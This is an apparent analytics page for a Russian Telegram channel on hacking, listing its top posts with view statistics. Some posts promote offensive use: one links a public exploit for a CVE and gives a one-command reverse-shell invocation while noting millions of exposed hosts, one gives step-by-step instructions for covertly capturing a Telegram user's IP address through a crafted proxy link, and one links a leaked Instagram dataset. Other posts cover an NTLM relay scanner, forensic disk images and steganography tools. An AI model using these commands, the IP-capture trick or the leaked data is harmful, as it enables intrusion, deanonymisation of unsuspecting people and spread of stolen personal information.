ККанал ламера

Канал ламера

@hackcrap💻 Технологии🇷🇺 Русский📅 март 2026 г.

Сборник полезной информации по информационной безопасности, авторским статьям, сливам и обзорам хак-софта с ведущих IT-каналов в ТГ. Подписывайся, ну либо пропускай все самое интересное.

📊 Полная статистика📝 Все посты
##39#ad#pentest#soft#git#relay#redteam#recon
373
Подписчики
165,813
Ср. охват
44.5%
Вовлечённость
16
Постов
~0.1
В день

Графики

📊 Средний охват постов

📉 ERR % по дням

📋 Публикации по дням

📎 Типы контента

Лучшие публикации

16 из 16
Hhackcrap
hackcrap
10 дек., 14:33

Рабочий эксплоит Спустя сутки после тряски с нейрослопом, его, наконец, написали https://github.com/Spritualkb/CVE-2025-55182-exp (сырой запрос можно найти тут). Работает на любом уязвимом приложении из коробки, я уже проверил сам. Получить шелл в одну команду можно так python3 exp.py http://127.0.0.1:3000 --revshell 127.0.0.1 1234 Предварительно надо не забыть поднять слушатель (не смотря на надпись, сам скрипт этого не делает). Сейчас в интернете находится 8.7 миллионов потенциально уязвимых и...

👁 268📷 photo
Hhackcrap
hackcrap
25 дек., 22:26

Кстати, в продолжение темы стеганографии, я уже писал про очень интересный проект ChamelionLab в своем канале Forensictools который, наверно, один из немногих с нормальным интерфейсом и функционалом позволяет, не только искать скрытую стеганографию, но и прятать. Причем делает и то и другое - великолепно.

👁 238
Hhackcrap
hackcrap
11 янв., 10:14

Нашумевшая утечка instagram: https://anonfilesnew.com/s/GlmIa9G-tI6 Канал ламера

👁 221
Hhackcrap
hackcrap
8 дек., 14:09

Просто образы дисков для обучения криминалистов в извлечение данных на разных платформах.

👁 205
Hhackcrap
hackcrap
11 янв., 09:37

Нашли простой способ, как можно слить IP-адрес у ничего не подозревающего собеседника в Telegram, в один клик. Пошагово: 1. Поднимаем mitmproxy или другой listener 2. Пишем любой текст и указываем ссылку t.me/proxy?server=<LISTENER_IP>&port=<LISTENER_PORT>&secret=random 3. Ждем, пока по ней кликнут, и сразу же получаем IP Работает на iOS и Android, благодаря "автопингу" прокси. Плюс метода в том, что подвержены как старые, так и новые клиенты, а главное — никакого предупреждения о раскрытии IP п...

👁 184🎬 video
Hhackcrap
hackcrap
10 февр., 13:23

Новый сканер для обнаружения уязвимостей к NTLM релеям https://github.com/depthsecurity/RelayKing-Depth/ Сканирует по SMB, LDAP/S, MSSQL, HTTP/S, RPC, WinRM Находит WebDAV WebClient, CVE-2025-33073 (NTLM reflection), NTLMv1 + всякие PrinterBug, PetitPotam и т.п. Поддерживает аудит всего домена Составляет список таргетов для ntlmrelayx и других софтин. * Сохраняет отчет в plaintext/JSON/CSV/Markdown Есть статья в блоге: https://www.depthsecurity.com/blog/introducing-relayking-relay-to-royalty/ #s...

👁 173📷 photo

Типы хуков

Нейтральный16 | 166 просм.

Длина постов

Длинные (500-1000)5 | 157 просм.
Короткие (<200)3 | 187 просм.
Очень длинные (1000+)3 | 105 просм.
Средние (200-500)1 | 238 просм.

Типы контента

📝
7
text
191 просм.
🎬
1
video
184 просм.
📷
8
photo
142 просм.
Канал ламера (@hackcrap) — Telegram-канал | PostSniper